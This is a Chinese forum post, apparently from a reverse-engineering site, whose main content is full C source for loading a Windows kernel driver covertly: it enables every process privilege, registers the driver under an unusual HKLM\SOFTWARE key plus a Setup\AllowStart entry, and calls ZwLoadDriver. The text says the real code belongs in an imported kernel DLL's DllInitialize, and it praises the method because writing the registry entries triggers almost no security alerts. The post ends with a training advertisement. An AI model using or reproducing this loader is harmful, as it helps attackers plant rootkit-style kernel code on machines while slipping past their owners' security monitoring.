先上代码~
#include <stdio.h>
#include <tchar.h>
#include <locale.h>
#include <windows.h>
#include <stdlib.h>
#include <psapi.h>
#include <Tlhelp32.h>
#pragma comment (lib, "psapi.lib")
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef struct _STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} ANSI_STRING;
typedef ANSI_STRING *PANSI_STRING;
DWORD drvldr_load(char* drvname)
{
char regkey[512];
int buflen;
UNICODE_STRING us;
ANSI_STRING as;
HMODULE hNtdll = LoadLibraryA( ("ntdll.dll") );
int (__stdcall *RtlAnsiStringToUnicodeString)(void*,void*,int)=
(int (__stdcall *)(void *,void *,int))GetProcAddress(hNtdll,"RtlAnsiStringToUnicodeString");
int (__stdcall *ZwLoadDriver)(void*)=
(int (__stdcall *)(void *))GetProcAddress(hNtdll,"ZwLoadDriver");
///
buflen=sprintf(regkey,"\\Registry\\Machine\\SOFTWARE\\%s",drvname);
as.Buffer = (PCHAR)regkey;
as.Length = (USHORT)buflen;
as.MaximumLength=(USHORT)buflen;
RtlAnsiStringToUnicodeString(&us, &as,TRUE);
return ZwLoadDriver(&us);
}
DWORD drvldr_reg(char* drvname,DWORD start_type,char* path)
//path should be kernel type like \??\xxx
{
char regkey[512];
DWORD regdata;
int buflen;
HKEY hkey;
///
sprintf(regkey,"SOFTWARE\\%s",drvname);
if(RegCreateKeyA(HKEY_LOCAL_MACHINE, regkey, &hkey)!=ERROR_SUCCESS)
{return -1;}
regdata=SERVICE_KERNEL_DRIVER;
RegSetValueExA(hkey, ("Type"), 0, REG_DWORD, (const unsigned char *)®data, 4);
regdata=SERVICE_ERROR_NORMAL;
RegSetValueExA(hkey, ("ErrorControl"), 0, REG_DWORD, (const unsigned char *)®data, 4);
regdata = start_type;
RegSetValueExA(hkey, ("Start"), 0, REG_DWORD, (const unsigned char *)®data, 4);
buflen = strlen(drvname);
RegSetValueExA(hkey, ("DisplayName"), 0, REG_EXPAND_SZ, (const unsigned char *)drvname, buflen);
buflen = strlen(path);
RegSetValueExA(hkey, ("ImagePath"), 0, REG_EXPAND_SZ, (const unsigned char *)path, buflen);
RegSetValueExA(hkey,("Group"),0,REG_SZ,(const BYTE *)"Base",strlen("Base"));
RegCloseKey(hkey);
//sprintf(regkey,"System\\CurrentControlSet\\Services\\%s",drvname);
//RegCreateKeyA(HKEY_LOCAL_MACHINE, regkey, &hkey);
//regdata=SERVICE_KERNEL_DRIVER;
//RegCloseKey(hkey);
sprintf(regkey,"System\\Setup\\AllowStart\\%s",drvname);
RegCreateKeyA(HKEY_LOCAL_MACHINE, regkey, &hkey);
regdata=SERVICE_KERNEL_DRIVER;
RegCloseKey(hkey);
return 0;
}
//Jan 4 2005
//Enable specific privilege
BOOL EnableSpecificPrivilege(BOOL bEnable,LPCTSTR Name)
{
BOOL bResult = FALSE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken) == 0)
{
return FALSE;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
bResult = LookupPrivilegeValue(NULL,Name,&TokenPrivileges.Privileges[0].Luid);
if(!bResult)
{
CloseHandle(hToken);
return FALSE;
}
bResult = AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError() != ERROR_SUCCESS || !bResult)
{
CloseHandle(hToken);
return FALSE;
}
CloseHandle(hToken);
return TRUE;
}
//Jan 4 2005
//Enable all privilege, return num of privileges successfully enabled
DWORD EnableAllPrivilege(BOOL bEnable)
{
DWORD count=0;
///
count+=EnableSpecificPrivilege(bEnable,SE_ASSIGNPRIMARYTOKEN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_AUDIT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_BACKUP_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CHANGE_NOTIFY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PAGEFILE_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PERMANENT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CREATE_TOKEN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_DEBUG_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_INC_BASE_PRIORITY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_INCREASE_QUOTA_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_LOAD_DRIVER_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_LOCK_MEMORY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_PROF_SINGLE_PROCESS_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_REMOTE_SHUTDOWN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_RESTORE_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SECURITY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SHUTDOWN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_ENVIRONMENT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_PROFILE_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SYSTEMTIME_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_TAKE_OWNERSHIP_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_TCB_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_UNSOLICITED_INPUT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_MACHINE_ACCOUNT_NAME);
return count;
}
int _tmain(int argc, _TCHAR* argv[])
{
EnableAllPrivilege(TRUE);
drvldr_reg("caonima",3,"\\??\\D:\\1.sys");
drvldr_load("caonima");
return 0;
}
对于1.sys的有些特殊的要求,首先1.sys里的代码不会被真的执行,但是1.sys这个驱动导入的动态库驱动可以被执行
举例下图:
1.sys的导入表样子:
导入的dllsys的导出表样子:
真正被执行的代码要写在动态库驱动的NTSTATUS DllInitialize(IN PUNICODE_STRING RegistryPath)里~~
具体怎么写内核版动态库,请自行baidu研究。
好了爆完~这个方法的好处就是写注册表的过程基本不触发任何报警——至于加载部分,仁者见仁吧,这玩意2005年的东西了~
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法